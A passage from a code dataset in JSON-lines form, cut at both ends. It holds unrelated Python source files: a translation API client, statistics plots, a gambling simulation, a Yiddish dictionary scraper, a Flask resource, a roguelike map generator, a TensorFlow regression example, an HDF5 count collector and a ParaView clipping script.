None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n\ndef do_request(data):\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n return requests.post(YOUDAO_URL, data=data, headers=headers)\n\n\ndef connect(text, source, target):\n # q = input(\"待输入的文字:\")\n q = text\n\n data = {}\n data['from'] = source\n data['to'] = target\n # data['from'] = 'en'\n # data['to'] = 'zh-CHS'\n data['signType'] = 'v3'\n curtime = str(int(time.time()))\n data['curtime'] = curtime\n salt = str(uuid.uuid1())\n signStr = APP_KEY + truncate(q) + salt + curtime + APP_SECRET\n sign = encrypt(signStr)\n data['appKey'] = APP_KEY\n data['q'] = q\n data['salt'] = salt\n data['sign'] = sign\n # data['vocabId'] = \"您的用户词表ID\"\n\n response = do_request(data)\n contentType = response.headers['Content-Type']\n if contentType == \"audio/mp3\":\n millis = int(round(time.time() * 1000))\n filePath = \"voice/\" + str(millis) + \".mp3\"\n fo = open(filePath, 'wb')\n fo.write(response.content)\n fo.close()\n else:\n print(response.content.decode())\n\n res = response.content.decode()\n try:\n res = eval(res)\n except NameError:\n index = res.find('\\\"isWord\\\":') + 9\n print(index)\n res = changeUpper(res, index)\n res = eval(res)\n return res\n\n\nif __name__ == '__main__':\n text = input('text: ')\n connect(text, 'en', 'zh')\n","repo_name":"RickWayne1125/EngBot","sub_path":"backend/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29456573982","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport seaborn as sns\nimport statsmodels.api as stat\n\nsns.set()\npath= '/home/shamik/PycharmProjects/term paper/data'\ndata= pd.read_csv(f'{path}/final_output.csv')\ngdp= preprocessing.scale(data['per capita GDP'])\nunemployment= preprocessing.scale(data['unemployment rate'])\ngini= preprocessing.scale(data['gini index'])\n\nx0 = preprocessing.scale(data['unemployment rate'])\nx1 = preprocessing.scale(data['gini index'])\ny= preprocessing.scale(data['per capita GDP'])\n\nconstant0 = stat.add_constant(x0)\nconstant1 = stat.add_constant(x1)\n\nmodel0= stat.OLS(y, x0).fit()\nmodel1= stat.OLS(y, x1).fit()\n\n\nsns.scatterplot(gdp, unemployment)\nsns.lineplot(y, model0.predict(y), color='red')\nplt.ylabel('unemployment rate')\nplt.xlabel('per capita GDP')\nplt.show()\n\nsns.scatterplot(gdp, gini)\nsns.lineplot(y, model1.predict(y), color='red')\nplt.ylabel('gini index')\nplt.xlabel('per capita GDP')\nplt.show()","repo_name":"Shamik69/term-paper","sub_path":"code/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"512335383","text":"# Program Of Gambler\nimport random\nstake=int(input(\"Enter the stake\\n\"))\ngoal=int(input(\"Enter the goal\\n\"))\ntrials=int(input(\"Enter the trials\\n\"))\nbets=0\nwins=0\n# Traverse from 0 to trials\nfor i in range(trials):\n cash=stake # Initialize Stake to Cash\n while cash > 0 and cash < goal:\n bets=bets+1\n if random.random() < 0.5:\n cash = cash + 1\n else:\n cash = cash - 1\n if cash == goal:\n wins=wins + 1 #If cash reached to goal then increment wins\nx=100*wins/trials\na=100-x\n# Printing percentage of Game won,loss.\nprint(str(wins) + \" wins of \" + str(trials))\nprint(\"Percent of games won = \" + str(x))\nprint(\"Percent of game loss=\"+str(a))\nprint(\"Avg # bets = \" + str(bets / trials))\n\n","repo_name":"Ibbukanch/Python-programs","sub_path":"pythonprograms/Functional/Gambler.py","file_name":"Gambler.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41272700174","text":"#!/usr/bin/env python3\n\nimport string\nimport re\nimport json\nimport argparse\nimport numpy as np\nimport os.path as op\nfrom wiktionaryparser import WiktionaryParser\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\n\n\ndef wiktionary_definition(wordlist):\n \"\"\"Get definition for wordlist from Wiktionary.\n\n Parameters\n ----------\n wordlist : dict\n Dictionary whose keys are words to check from wiktionary. Values are\n ignored.\n\n Returns\n -------\n wordlist : dict\n The input dictionary, with a wiktionary entry added (entry is a list of\n dictionaries)\n\n \"\"\"\n parser = WiktionaryParser()\n parser.set_default_language('Yiddish')\n parser.include_relation('derived terms')\n parser.include_relation('alternative forms')\n parser.include_relation('see also')\n for word, defs in wordlist.items():\n print(f'Looking up {word} from Wiktionary')\n wikt = parser.fetch(word)\n for wi in wikt:\n wi['transliteration'] = []\n # remove the audio, which is never there anyway\n wi['pronunciations'] = wi['pronunciations']['text']\n for defi in wi['definitions']:\n txt = defi.pop('text')\n defi['text'] = txt[1:]\n txt = txt[0]\n defi['lexeme'] = txt.split('•')[0].strip()\n wi['transliteration'].append(txt.split('•')[1].split(')')[0].replace('(', '').strip())\n if u'\\xa0' in txt:\n defi['gender'] = txt.split(u'\\xa0')[1].split(',')[0]\n else:\n defi['gender'] = None\n if 'plural' in txt:\n defi['plural'] = txt.split('plural')[1].strip()\n else:\n defi['plural'] = None\n if 'participle' in txt:\n defi['participle'] = txt.split('participle')[1].replace('))', ')').strip()\n else:\n defi['participle'] = None\n if len(set(wi['transliteration'])) == 1:\n wi['transliteration'] = wi['transliteration'][0]\n wordlist[word]['wiktionary'] = wikt\n return wordlist\n\n\ndef _get_word_from_kentucky(browser, word):\n \"\"\"Construct dictionary with definition for a single word.\n\n when finding a match:\n - it will be a span/goodmatch\n - can't assume it will be the first / last / anything\n - can't assume it will be on the outside list\n - can't assume it will be the only word in the span\n - entry will be have the stem in the lexeme, if there are multiple, take all.\n - if there isn't an entry there the stem is in the lexeme: take all goodmatches\n\n Parameters\n ----------\n browser : selenium.webdriver\n Browser opened to the Kentucky Yiddish dictionary page.\n word : str\n Word to get the definition for\n\n Returns\n -------\n definition : dict\n Dictionary containing all info scraped from the dictionary.\n\n \"\"\"\n print(f'Looking up {word} from the Kentucky dictionary')\n browser.find_element('name', 'base').send_keys(word + Keys.RETURN)\n soup = BeautifulSoup(browser.page_source, 'html.parser')\n # Get transliteration\n transl = soup.find('span', 'grammar')\n assert soup.find(string='Converting ') == transl.previous_sibling.previous_sibling.previous_sibling, \"Can't find transliteration!\"\n stem = soup.find('span', 'goodmatch')\n try:\n assert soup.find(string='\\nThe base word for ') == stem.previous_sibling.previous_sibling.previous_sibling, \"Can't find transliteration!\"\n except AttributeError:\n return []\n ky = {'transliteration': transl.text, 'stem': stem.text}\n # sometimes the stem is multiple words for some reason\n stem = stem.text.split(' ')[0]\n # azoy words[11] has many examples, which I'd like -- they're all in the\n # lexeme but don't start the entry. amol words[5] is not in the lexeme at\n # all, want to not grab the entry in goodmatches so we go to the else\n # statement\n goodmatches = [gm for gm in soup.find('ul').find_all('span', 'goodmatch')\n if stem in gm.parent.text]\n goodmatches = [gm for gm in goodmatches if 'class' in gm.parent.attrs and\n 'lexeme' in gm.parent.attrs['class']]\n if len(goodmatches) == 0:\n entries = [gm.parent for gm in\n soup.find('ul').find_all('span', 'goodmatch')]\n else:\n entries = [gm.parent.parent for gm in goodmatches]\n lexs = [entr.find('span', 'lexeme').text.replace('(', '').strip()\n for entr in entries]\n entries = [entr for entr, lex in zip(entries, lexs) if stem in lex]\n lexemes = []\n parts_of_speech = []\n plurals = []\n participles = []\n genders = []\n definitions = []\n for entr in entries:\n try:\n lex = entr.find('span', 'lexeme').text.replace('(', '').strip()\n except AttributeError:\n continue\n lexemes.append(lex)\n try:\n pos = entr.find('span', 'grammar').text.split(',')[0]\n if not pos.startswith('plural') and not pos.startswith('gender'):\n parts_of_speech.append(pos.strip())\n else:\n parts_of_speech.append(None)\n except AttributeError:\n parts_of_speech.append(None)\n try:\n plural = entr.find('span', 'grammar')\n if not plural.text.startswith('plural'):\n plural.text.split(',')[1]\n plural_text = plural.next_sibling.split(',')[0].replace('(','').strip()\n if plural.next_sibling.next_sibling.attrs['class'] == ['hebrew']:\n plural_text += f' ({plural.next_sibling.next_sibling.text})'\n plurals.append(plural_text)\n except (IndexError, AttributeError):\n plurals.append(None)\n part = entr.find('span', string='participle')\n if part is not None:\n participles.append(part.next_sibling.text.replace(',', '').strip())\n else:\n participles.append(None)\n gdr = entr.find('span', 'grammar', string=re.compile(r'gender.*'))\n if gdr is not None:\n genders.append(gdr.text.replace(',', '').replace('gender', '').strip())\n else:\n genders.append(None)\n try:\n definitions.append(entr.find('span', 'definition').text)\n except AttributeError:\n definitions.append(None)\n # we sometimes get duplicates for some reason, so we do this to make sure\n # each entry is unique\n definitions = set([(pos, defi, gdr, part, pl, lex) for pos, defi, gdr, part, pl, lex\n in zip(parts_of_speech, definitions, genders,\n participles, plurals, lexemes)])\n ky['definitions'] = [dict(zip(['partOfSpeech', 'text', 'gender', 'participle',\n 'plural', 'lexeme'], word)) for word in definitions]\n return ky\n\n\ndef kentucky_definition(wordlist):\n \"\"\"Get definition for wordlist from Kentucky Yiddish dictionary.\n\n Kentucky Yiddish Dictionary is at\n https://www.cs.uky.edu/~raphael/yiddish/dictionary.cgi. We use selenium to\n get definitions (so chrome / chromium is required and a browser will open\n while grabbing the info).\n\n Parameters\n ----------\n wordlist : dict\n Dictionary whose keys are words to check from Kentucky dictionary.\n Values are ignored.\n\n Returns\n -------\n wordlist : dict\n The input dictionary, with a kentucky entry added (entry is a list of\n dictionaries)\n\n \"\"\"\n dictionary_url = 'https://www.cs.uky.edu/~raphael/yiddish/dictionary.cgi'\n browser = webdriver.Chrome()\n browser.get(dictionary_url)\n for word in wordlist.keys():\n wordlist[word]['kentucky'] = _get_word_from_kentucky(browser, word)\n return wordlist\n\n\ndef initialize_wordlist(text):\n \"\"\"Initialize wordlist.\n\n Convert text of story to the initial wordlist. This returns a dictionary\n whose keys are the words and whose values are dictionaries with a single\n key, \"index\", whose values are lists containing the indices of that word in\n the story.\n\n Before extracting the word indices, we strip all newlines, punctuation, and\n digits.\n\n Parameters\n ----------\n text : str\n Single string containing a complete Yiddish story.\n\n Returns\n -------\n wordlist : dict\n Initial wordlist, see above for description.\n\n \"\"\"\n # remove newlines\n text = text.replace('\\n', ' ')\n # remove all punctuation\n punct = string.punctuation + '—“„'\n text = text.translate(str.maketrans(' ', ' ', punct))\n # remove all digits\n text = text.translate(str.maketrans('', '', '0123456789'))\n # split text into words\n text = np.array([t for t in text.split(' ') if t])\n # get the indices for each word\n wordlist = dict([(t, {'index': np.where(text==t)[0].tolist()})\n for t in set(text)])\n for word in wordlist.values():\n word['count (story)'] = len(word['index'])\n word['frequency (story)'] = word['count (story)'] / len(text)\n return wordlist\n\n\ndef main(text, dictionaries=['wiktionary', 'kentucky']):\n \"\"\"Convert Yiddish text to vocabulary list.\n\n Parameters\n ----------\n text : str\n Single string containing a complete Yiddish story.\n dictionaries : list\n Some subset of {'wiktionary', 'kentucky'}. The dictionaries to check.\n\n Returns\n -------\n wordlist : dict\n Vocabulary list, dictionary with Yiddish words as keys.\n\n \"\"\"\n wordlist = initialize_wordlist(text)\n if 'wiktionary' in dictionaries:\n wordlist = wiktionary_definition(wordlist)\n if 'kentucky' in dictionaries:\n wordlist = kentucky_definition(wordlist)\n return wordlist\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Construct vocabulary list based on Yiddish text.\")\n parser.add_argument('input_path', help=\"Path to the story to read in. Should be a .txt or other plaintext file.\")\n parser.add_argument('--output_path', '-o', default=None,\n help=(\"Path to save the vocabulary list at. Should be a json. If unset, \"\n \"we save a json with the same name as the input.\"))\n parser.add_argument(\"--dictionaries\", '-d', nargs='+', default=['wiktionary', 'kentucky'],\n choices=['wiktionary', 'kentucky'],\n help=\"Which dictionaries to check for definitions.\")\n args = vars(parser.parse_args())\n output = args.pop('output_path')\n if output is None:\n output = op.splitext(args['input_path'])[0] + '.json'\n elif not output.endswith('json'):\n raise ValueError(\"output_path must end in .json!\")\n with open(args['input_path']) as f:\n text = f.read()\n wordlist = main(text, args['dictionaries'])\n with open(output, 'w') as f:\n json.dump(wordlist, f, ensure_ascii=False)\n","repo_name":"billbrod/yiddish_wordlist","sub_path":"yiddish_wordlist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73311912089","text":"from flask_restful import Resource, reqparse\nfrom Vehiculos.models.vehiculo import VehiculoModel\n\n\nclass Vehiculo(Resource):\n \n parser = reqparse.RequestParser()\n parser.add_argument(\n \n 'marca_vehiculo',\n type= str,\n required = True,\n help = \"Falta la marca_vehiculo\" \n )\n parser.add_argument(\n \n 'modelo_vehiculo',\n type= str,\n required = True,\n help = \"Falta modelo\" \n )\n \n \n def get(self, marca):\n \n # Selefc * from producto where desc = nombre\n # Query.fetchone()\n vehiculo = VehiculoModel.query.filter_by(desc = marca).first()\n if vehiculo:\n return vehiculo.devolverjson()\n \n return {'message' : 'No existe el vehiculo'}, 404\n \n def post(self):\n data = Vehiculo.parser.parse_args()\n vehiculo = VehiculoModel(data['marca_vehiculo'],data['modelo_vehiculo'])\n \n try:\n producto.guardar_en_bd()\n \n except:\n return{'message': 'Hubo un error al guardar en la base de datos'}, 500\n return {'message': 'Se guardo el vehiculo exitosamente', 'vehiculo' : data['marca_vehiculo']}\n # return {'message': 'Se guardo la categoria exitosamente', 'categoria' : data['categoria']}","repo_name":"GuidoTorres/codigo8","sub_path":"Semana8/Vehiculos/controllers/vehiculo.py","file_name":"vehiculo.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20549376129","text":"from collision import Collision\nfrom tools import Rect\nfrom random import randint\n\nMAP_WIDTH = 30\nMAP_HEIGHT = 25\nplayer_x = 2\nplayer_y = 2\n\n\nclass Level_Map:\n def __init__(self, height, width):\n self.width = width\n self.height = height\n self.tiles = self.gen_tiles()\n\n def gen_tiles(self):\n tiles = [[Collision(True) for x in range(self.width)] for y in\n range(self.height)]\n return tiles\n\n def gen_map(self, max_rooms, room_min_size, room_max_size, MAP_WIDTH,\n MAP_HEIGHT, player):\n # room1 = Rect(0, 0, 6, 6)\n # room2 = Rect(8, 8, 6, 6)\n\n # self.make_room(room1)\n # self.make_room(room2)\n rooms = []\n num_rooms = 0\n\n for r in range(max_rooms):\n w = randint(room_min_size, room_max_size)\n h = randint(room_min_size, room_max_size)\n x = randint(0, MAP_WIDTH - w - 1)\n y = randint(0, MAP_HEIGHT - h - 1)\n\n new_room = Rect(x, y, w, h)\n\n for other_room in rooms:\n if new_room.intersect(other_room):\n break\n else:\n self.make_room(new_room)\n (new_x, new_y) = new_room.center()\n if num_rooms == 0:\n player.x = new_x\n player.y = new_y\n else:\n (prev_x, prev_y) = rooms[num_rooms - 1].center()\n if randint(0, 1) == 1:\n self.make_tunnelh(prev_x, new_x, prev_y)\n self.make_tunnelv(prev_y, new_y, prev_x)\n else:\n self.make_tunnelv(prev_y, new_y, prev_x)\n self.make_tunnelh(prev_x, new_x, prev_y)\n rooms.append(new_room)\n num_rooms += 1\n\n def make_room(self, room):\n for x in range(room.x1 + 1, room.x2):\n for y in range(room.y1 + 1, room.y2):\n self.tiles[x][y].solid = False\n\n def make_tunnelh(self, x1, x2, y):\n for x in range(min(x1, x2), max(x1, x2) + 1):\n self.tiles[x][y].solid = False\n\n def make_tunnelv(self, y1, y2, x):\n for y in range(min(y1, y2), max(y1, y2) + 1):\n self.tiles[x][y].solid = False\n\n def is_solid(self, x, y):\n if self.tiles[x][y].solid:\n return True\n\n return False\n\n\nlevelmap = Level_Map(MAP_WIDTH, MAP_HEIGHT)\n","repo_name":"0xRainy/raindrops-rl","sub_path":"levelmap.py","file_name":"levelmap.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36885299502","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nimport imports85 # pylint: disable=g-bad-import-order\n\nSTEPS = 5000\nPRICE_NORM_FACTOR = 1000\n\n\ndef main(argv):\n \"\"\"Builds, trains, and evaluates the model.\"\"\"\n assert len(argv) == 1\n (train, test) = imports85.dataset()\n\n # Switch the labels to units of thousands for better convergence.\n def normalize_price(features, labels):\n return features, labels / PRICE_NORM_FACTOR\n\n train = train.map(normalize_price)\n test = test.map(normalize_price)\n\n # Build the training input_fn.\n def input_train():\n return (\n # Shuffling with a buffer larger than the data set ensures\n # that the examples are well mixed.\n train.shuffle(1000).batch(128)\n # Repeat forever\n .repeat())\n\n # Build the validation input_fn.\n def input_test():\n return test.shuffle(1000).batch(128)\n\n # The first way assigns a unique weight to each category. To do this you must\n # specify the category's vocabulary (values outside this specification will\n # receive a weight of zero). Here we specify the vocabulary using a list of\n # options. The vocabulary can also be specified with a vocabulary file (using\n # `categorical_column_with_vocabulary_file`). For features covering a\n # range of positive integers use `categorical_column_with_identity`.\n body_style_vocab = [\"hardtop\", \"wagon\", \"sedan\", \"hatchback\", \"convertible\"]\n body_style = tf.feature_column.categorical_column_with_vocabulary_list(\n key=\"body-style\", vocabulary_list=body_style_vocab)\n make = tf.feature_column.categorical_column_with_hash_bucket(\n key=\"make\", hash_bucket_size=50)\n\n feature_columns = [\n tf.feature_column.numeric_column(key=\"curb-weight\"),\n tf.feature_column.numeric_column(key=\"highway-mpg\"),\n # Since this is a DNN model, convert categorical columns from sparse\n # to dense.\n # Wrap them in an `indicator_column` to create a\n # one-hot vector from the input.\n tf.feature_column.indicator_column(body_style),\n # Or use an `embedding_column` to create a trainable vector for each\n # index.\n tf.feature_column.embedding_column(make, dimension=3),\n ]\n\n # Build a DNNRegressor, with 2x20-unit hidden layers, with the feature columns\n # defined above as input.\n model = tf.estimator.DNNRegressor(\n hidden_units=[20, 20], feature_columns=feature_columns)\n\n # Train the model.\n model.train(input_fn=input_train, steps=STEPS)\n\n # Evaluate how the model performs on data it has not yet seen.\n eval_result = model.evaluate(input_fn=input_test)\n\n # The evaluation returns a Python dictionary. The \"average_loss\" key holds the\n # Mean Squared Error (MSE).\n average_loss = eval_result[\"average_loss\"]\n\n # Convert MSE to Root Mean Square Error (RMSE).\n print(\"\\n\" + 80 * \"*\")\n print(\"\\nRMS error for the test set: ${:.0f}\"\n .format(PRICE_NORM_FACTOR * average_loss**0.5))\n\n print()\n\n\nif __name__ == \"__main__\":\n # The Estimator periodically generates \"INFO\" logs; make these logs visible.\n tf.logging.set_verbosity(tf.logging.INFO)\n tf.app.run(main=main)\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/examples/get_started/regression/dnn_regression.py","file_name":"dnn_regression.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"72683498328","text":"import sys\nimport os\nimport numpy as np\nimport glob \nimport pdb\nimport gzip\nimport h5py\nimport re\n\nfrom ..utils import hdf5\n\ndef parse_options(argv):\n\n \"\"\"Parses options from the command line \"\"\"\n\n from argparse import ArgumentParser\n\n parser = ArgumentParser(prog='collect_counts',\n description='This script collects expression counts in TSV format and aggregates them in a single HDF5 file. Please note \\\n that there are several ways to provide the list of input files (see options below). You must specifiy the input \\\n files using one of these options. If you specify multiple options, they are parsed in the following precedence: \\\n -i, -f, -p.\\n')\n parser.add_argument('-i', '--input', dest='infiles_fnames', metavar='STR', nargs='+', help='list of expression count files in TSV format', default='-')\n parser.add_argument('-f', '--filelist', dest='infiles_flist', metavar='STR', help='text file listing expression count files', default='-')\n parser.add_argument('-p', '--pattern', dest='infiles_fpattern', metavar='STR', help='search pattern describing list of expression count files', default='-')\n parser.add_argument('-o', '--outfile', dest='outfile', metavar='STR', help='name of output file (will be hdf5)', default='-', required=True)\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='switch on verbose output [off]', default=False)\n \n return parser.parse_args(argv[1:])\n\n\ndef main():\n\n options = parse_options(sys.argv)\n\n if options.infiles_fnames != '-':\n files = options.infiles_fnames\n elif options.infiles_flist != '-':\n files = np.loadtxt(options.infiles_flist, dtype='str', delimiter='\\t')\n elif options.infiles_fpattern != '-':\n files = glob.glob(options.infiles_fpattern)\n else:\n sys.stderr.write('ERROR: You need to provide at least one form of input via -i, -f, or -p\\n')\n return 1\n\n OUT = h5py.File(options.outfile, 'w')\n\n counts = []\n header = ['feature']\n labels = []\n for f, fname in enumerate(files):\n if options.verbose:\n print('(%i / %i) Loading %s' % (f + 1, len(files), fname), file=sys.stderr)\n data = np.loadtxt(fname, dtype='str', delimiter='\\t')\n\n #sid = re.sub(r'.tsv$', '', fname.split('/')[-1])\n assert data[0, 0] == 'gene_id', 'ERROR: data has no header!'\n sid = data[0, 1]\n\n if f == 0:\n OUT.create_dataset('sids', data=np.array([sid]).view(np.chararray).encode('utf-8'), dtype='|S128', chunks=True, compression='gzip', maxshape=(None,))\n OUT.create_dataset('gids', data=data[1:, 0].view(np.chararray).encode('utf-8'))\n OUT.create_dataset('counts', data=data[1:, 1][:, np.newaxis].astype('int'), chunks=True, compression='gzip', maxshape=(data.shape[0], None))\n else:\n assert(np.all(OUT['gids'][:].view(np.chararray).decode('utf-8') == data[1:, 0]))\n hdf5.append(OUT, np.array([sid], dtype='|S128'), 'sids')\n hdf5.append(OUT, data[1:, 1].astype('int'), 'counts')\n del data\n OUT.close()\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"ratschlab/gromics","sub_path":"gromics/counting/collect_counts.py","file_name":"collect_counts.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35677422250","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# create a new 'OpenFOAMReader'\nswBfoam = OpenFOAMReader(FileName='SwB.foam')\nswBfoam.MeshRegions = ['internalMesh']\nswBfoam.CellArrays = ['CH4Mean', 'CH4Prime2Mean', 'CO2Mean', 'CO2Prime2Mean', 'COMean', 'COPrime2Mean', 'H2Mean', 'H2OMean', 'H2OPrime2Mean', 'H2Prime2Mean', 'N2Mean', 'N2Prime2Mean', 'NOMean', 'NOPrime2Mean', 'O2Mean', 'O2Prime2Mean', 'OHMean', 'OHPrime2Mean', 'T', 'TMean', 'TPrime2Mean', 'U', 'UMean', 'UPrime2Mean', 'Z', 'ZMean', 'ZPrime2Mean', 'alphaSgs', 'chi', 'chiMean', 'chiPrime2Mean', 'muSgs', 'p', 'rho', 'thermo:alpha', 'thermo:mu', 'thermo:psi', 'varZ', 'varZMean', 'varZPrime2Mean']\n\n# get animation scene\nanimationScene1 = GetAnimationScene()\n\n# update animation scene based on data timesteps\nanimationScene1.UpdateAnimationUsingDataTimeSteps()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# uncomment following to set a specific view size\nrenderView1.ViewSize = [2199, 1890]\n\n# get color transfer function/color map for 'p'\npLUT = GetColorTransferFunction('p')\npLUT.RGBPoints = [92308.953125, 0.231373, 0.298039, 0.752941, 103047.96875, 0.865003, 0.865003, 0.865003, 113786.984375, 0.705882, 0.0156863, 0.14902]\npLUT.ScalarRangeInitialized = 1.0\n\n# get opacity transfer function/opacity map for 'p'\npPWF = GetOpacityTransferFunction('p')\npPWF.Points = [92308.953125, 0.0, 0.5, 0.0, 113786.984375, 1.0, 0.5, 0.0]\npPWF.ScalarRangeInitialized = 1\n\n# show data in view\nswBfoamDisplay = Show(swBfoam, renderView1)\n# trace defaults for the display properties.\nswBfoamDisplay.Representation = 'Surface'\nswBfoamDisplay.ColorArrayName = ['POINTS', 'p']\nswBfoamDisplay.LookupTable = pLUT\nswBfoamDisplay.OSPRayScaleArray = 'p'\nswBfoamDisplay.OSPRayScaleFunction = 'PiecewiseFunction'\nswBfoamDisplay.SelectOrientationVectors = 'U'\nswBfoamDisplay.ScaleFactor = 0.0760000079870224\nswBfoamDisplay.SelectScaleArray = 'p'\nswBfoamDisplay.GlyphType = 'Arrow'\nswBfoamDisplay.GlyphTableIndexArray = 'p'\nswBfoamDisplay.DataAxesGrid = 'GridAxesRepresentation'\nswBfoamDisplay.PolarAxes = 'PolarAxesRepresentation'\nswBfoamDisplay.ScalarOpacityFunction = pPWF\nswBfoamDisplay.ScalarOpacityUnitDistance = 0.005582608543122148\nswBfoamDisplay.GaussianRadius = 0.0380000039935112\nswBfoamDisplay.SetScaleArray = ['POINTS', 'p']\nswBfoamDisplay.ScaleTransferFunction = 'PiecewiseFunction'\nswBfoamDisplay.OpacityArray = ['POINTS', 'p']\nswBfoamDisplay.OpacityTransferFunction = 'PiecewiseFunction'\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# show color bar/color legend\nswBfoamDisplay.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip1 = Clip(Input=swBfoam)\nclip1.ClipType = 'Plane'\nclip1.Scalars = ['POINTS', 'p']\nclip1.Value = 103047.96875\n\n# init the 'Plane' selected for 'ClipType'\nclip1.ClipType.Origin = [0.0, 0.0, -0.019999995827674866]\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# show data in view\nclip1Display = Show(clip1, renderView1)\n# trace defaults for the display properties.\nclip1Display.Representation = 'Surface'\nclip1Display.ColorArrayName = ['POINTS', 'p']\nclip1Display.LookupTable = pLUT\nclip1Display.OSPRayScaleArray = 'p'\nclip1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip1Display.SelectOrientationVectors = 'U'\nclip1Display.ScaleFactor = 0.042000004276633265\nclip1Display.SelectScaleArray = 'p'\nclip1Display.GlyphType = 'Arrow'\nclip1Display.GlyphTableIndexArray = 'p'\nclip1Display.DataAxesGrid = 'GridAxesRepresentation'\nclip1Display.PolarAxes = 'PolarAxesRepresentation'\nclip1Display.ScalarOpacityFunction = pPWF\nclip1Display.ScalarOpacityUnitDistance = 0.004296650276400489\nclip1Display.GaussianRadius = 0.021000002138316633\nclip1Display.SetScaleArray = ['POINTS', 'p']\nclip1Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip1Display.OpacityArray = ['POINTS', 'p']\nclip1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(swBfoam, renderView1)\n\n# show color bar/color legend\nclip1Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# create a new 'Clip'\nclip2 = Clip(Input=clip1)\nclip2.ClipType = 'Plane'\nclip2.Scalars = ['POINTS', 'p']\nclip2.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip2.ClipType.Origin = [0.0, 0.0, 0.15000002272427082]\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# show data in view\nclip2Display = Show(clip2, renderView1)\n# trace defaults for the display properties.\nclip2Display.Representation = 'Surface'\nclip2Display.ColorArrayName = ['POINTS', 'p']\nclip2Display.LookupTable = pLUT\nclip2Display.OSPRayScaleArray = 'p'\nclip2Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip2Display.SelectOrientationVectors = 'U'\nclip2Display.ScaleFactor = 0.02100000083446503\nclip2Display.SelectScaleArray = 'p'\nclip2Display.GlyphType = 'Arrow'\nclip2Display.GlyphTableIndexArray = 'p'\nclip2Display.DataAxesGrid = 'GridAxesRepresentation'\nclip2Display.PolarAxes = 'PolarAxesRepresentation'\nclip2Display.ScalarOpacityFunction = pPWF\nclip2Display.ScalarOpacityUnitDistance = 0.002676453856209217\nclip2Display.GaussianRadius = 0.010500000417232515\nclip2Display.SetScaleArray = ['POINTS', 'p']\nclip2Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip2Display.OpacityArray = ['POINTS', 'p']\nclip2Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip1, renderView1)\n\n# show color bar/color legend\nclip2Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip3 = Clip(Input=clip2)\nclip3.ClipType = 'Plane'\nclip3.Scalars = ['POINTS', 'p']\nclip3.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip3.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Origin = [0.0, -0.05, 0.029999999329447746]\nclip3.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Origin = [0.0, -0.05, 0.029999999329447746]\nclip3.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# show data in view\nclip3Display = Show(clip3, renderView1)\n# trace defaults for the display properties.\nclip3Display.Representation = 'Surface'\nclip3Display.ColorArrayName = ['POINTS', 